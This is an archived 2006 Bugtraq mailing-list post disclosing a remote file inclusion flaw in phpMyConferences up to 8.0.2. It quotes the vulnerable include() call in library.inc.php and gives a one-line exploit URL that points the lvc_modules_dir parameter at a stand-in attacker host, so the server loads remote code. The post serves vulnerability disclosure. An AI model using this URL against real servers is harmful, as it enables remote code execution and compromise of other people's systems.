[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    phpMyConferences <= 8.0.2 Remote File Inclusion
From:       mfp.c () hotmail ! com
Date:       2006-10-31 15:56:01
Message-ID: 20061031155601.878.qmail () securityfocus ! com
[Download RAW message or body]

# phpMyConferences <= 8.0.2 Remote File Inclusion
#
# Found by mfp.c => mfp.c@hotmail.com [brazil rlz]
#
#  Greetz: F-117, Silver lords e pra tu pri :*
################################################
#	
#
# Arquivo: library.inc.php
# 
# Bug: 	
#   	if (!$gloaded_modules[$image_name])
#      		  {
#            		include($lvc_modules_dir.'/'.$module_name.'.module.php');
#            		$gloaded_modules[$module_name] = true;
#       	 }
#
#
# Exploit:
#
# http://localhost/phpMyConferences_8.0.2/common/visiteurs/include/library.inc.php?lvc_modules_dir=http://attack/
 #
#
# THANKS: Milw0rm,str0ke, google....
#
#
###############################################


[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic